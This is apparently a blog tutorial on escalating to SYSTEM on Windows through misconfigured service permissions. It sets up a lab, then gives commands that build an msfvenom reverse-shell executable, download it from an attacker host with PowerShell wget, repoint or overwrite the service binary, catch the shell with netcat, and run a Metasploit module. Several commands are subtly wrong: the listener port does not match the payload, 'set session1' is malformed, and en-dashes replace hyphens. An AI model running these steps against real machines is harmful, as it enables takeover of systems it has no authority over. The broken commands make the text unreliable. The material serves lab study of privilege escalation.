Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting misconfigured services is one technique to increase privileges.
Table of Content
·
MS Windows Services
·
Access Rights for
the Service Control Manager
·
Weak Service
Permission Lab Setup
·
Abusing Insecure
Configuration File Permissions (PTOC)
·
Abusing Insecure
Service Executable (PTO)
·
Metasploit
MS Windows Services
Microsoft
Windows services, formerly
known as NT services, enable you to create long-running executable applications
that run in their own Windows sessions. These services can be automatically
started when the computer boots, can be paused and restarted, and do not show
any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.
A
system or a user account must be linked to a service for it to function
properly. The following built-in system accounts are frequently used to operate
services:
·
LocalService
·
NetworkService
·
LocalSystem
Access Rights for
the Service Control Manager
The SCM creates a service object's security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the following access.
Weak
Service Permission Lab Setup
This article will help to
set up a lab that focuses on two Windows weak service Permission misconfigurations
that allow an attacker to get administrative privileges:
•
Insecure Configuration File Permissions: A low-privileged user can update service settings,
such as the service binary that runs when the service starts.
•
Insecure Service Executable: When the service starts, a low-privileged user can
overwrite the binary it launches.
An Access Control List (ACL)
for each service defines the permissions for that service. Some permissions are
extremely damaging, such as:
·
Command: sc qc
<service> - to query the configuration of the service
·
Command: sc query
<service> - to check the current status of the service
·
Command: net
start/stop <service> - to start and stop the service
·
Command: sc
config <service> <option>= <value> - change the configuration
of the service
Steps for Weak Services Permissions
Step 1: Run
CMD as administrator and execute the below command to create a service with the
name of Pentest inside /temp directory
sc.exe create pentest
binPath= "C:\temp\service.exe"
Step2: To create
a vulnerable service we need to assign some toxic privilege with the help of SubinACL
to change the permission of services.
NOTE:
SubInACL is a
little-known command-line tool from Microsoft, yet it is one of the best tools
to work with security permissions in Windows. This tool is capable of changing the
permissions of files, folders, registry keys, services, printers, cluster
shares and various other types of objects.
In this case, we have
granted a user permissions to suspend (pause/continue), start and stop
(restart) a service. The full list of the available service permissions:
Step3: After
Download SubinACL, execute the following command to assign PTOC Permissions user “ignite” against “Pentest” service.
cd C:\Program Files (x86)\Windows Resource Kits\Tools
subinacl.exe /service pentest /grant=msedgewin10\ignite=PTOC
Abusing Insecure
Configuration File Permissions (PTOC)
An attacker can escalate privileges by exploiting Service
Configuration if the system binaries have the SERVIC_ ALL_ACCESS or
SERVICE_CHANGE_CONFIG permissions.
Following an initial foothold, you may use the wmic
programme to enumerate system services and query for the service name,
startname, and path.
wmic service get
name,startname,pathname
The service name shown as pentest exits the c:/temp
directory, as shown in the following image. We may verify the service
configuration with the following command.
sc qc pentest
The service account type is Localsystem, and it has
privileges to start, stop, and pause services, according to the output.
We can identify SERVICE ALL ACCESS or SERVICE CHANGE CONFIG
permissions using the accesschk
Sysinternals tool since these capabilities allow attackers to change service
settings.
accesschk.exe
/accepteula –uwcqv ignite pentest
It says that Ignite user has full access to this service J
Create an executable shell and install it on the victim's
machine, then modify the service binary path to a malicious executable since the
user ignite has full access to the service and therefore has the ability to
change the configuration.
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3
lport=8888 –f exe > shell.exe
python –m SimpleHTTPserver 80
Use the following command to transfer malicious shell.exe
into C:/temp and start a new Netcat listener within Kali Linux.
cd c:\Users\public
powershell wget http://192.168.1.3/shell.exe
-o shell.exe
dir
Because the ignite user has
access to edit the service configuration and subsequently start the service, thus
we can change the path and point it to our reverse shell payload.
sc config pentest
binPath= "C:\Users\Public\shell.exe"
net start pentest
As soon as the service will launch, the attacker will get a
reverse connection in the new netcat session as NT Authority \system
nc –lvp 888
whoami
Abusing
Insecure Service Executable (PTO)
If the low-privilege user has at least Pause/continue,
Start, and Stop permissions for the service, an attacker may attempt to
overwrite the system binaries with a malicious executable file in order to escalate
privileges.
cd c:\temp
dir
move service.exe service.bak
Use the following command to transfer malicious shell.exe
into C:/temp and start a new Netcat listener within Kali Linux.
powershell wget http://192.168.1.3/shell.exe -o
service.exe
As soon as the service will launch, the attacker will get a reverse
connection in the new netcat session as NT Authority \system
nc –lvp 8888
whoami
Metasploit
This module attempts to exploit existing administrative
privileges to obtain a SYSTEM session. If directly creating a service fails,
this module will inspect existing services to look for insecure configuration,
file or registry permissions that may be hijacked. It will then attempt to
restart the replaced service to run the payload.
use exploit/windows/local/service_permissions
set lhost 192.168.1.3
set session1
exploit
This will result in a new session as NT AUTHORITY\SYSTEM when
this succeeds.
https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights
0 comments:
Post a Comment